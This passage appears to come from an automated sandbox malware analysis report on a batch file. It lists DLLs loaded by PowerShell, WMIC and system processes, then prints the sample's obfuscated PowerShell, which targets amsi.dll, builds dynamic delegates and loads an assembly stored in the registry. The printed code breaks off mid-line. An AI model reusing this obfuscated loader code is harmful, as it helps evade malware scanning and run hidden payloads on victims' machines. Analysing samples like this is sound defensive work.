Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: amsi.dll

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Q5N7WOpk8J.bat

Static file information: File size 5235007 > 1048576

Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000000.1789539029.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2545069443.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000002F.00000000.1789539029.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2545069443.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer($IHAbcsfdEtkEyD,$MlhLFxQWSgAKoXShnVb).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+'d'+'l'+''+'l'+'');$tHbMpbZeVqMdjOqLT=$doZKqFPbZxNLSh.Invoke($Null,@([Obje
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+'T'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](99)+''+'n'+'t'+[Char](45)+'s'

Obfuscated command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oxbNdIdJMSmp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KEMhNhDQCLRUNV,[Parameter(Position=1)][Type]$HGdpxLKyUQ)$khFifhQytpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+'e'+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$khFifhQytpa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KEMhNhDQCLRUNV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$khFifhQytpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+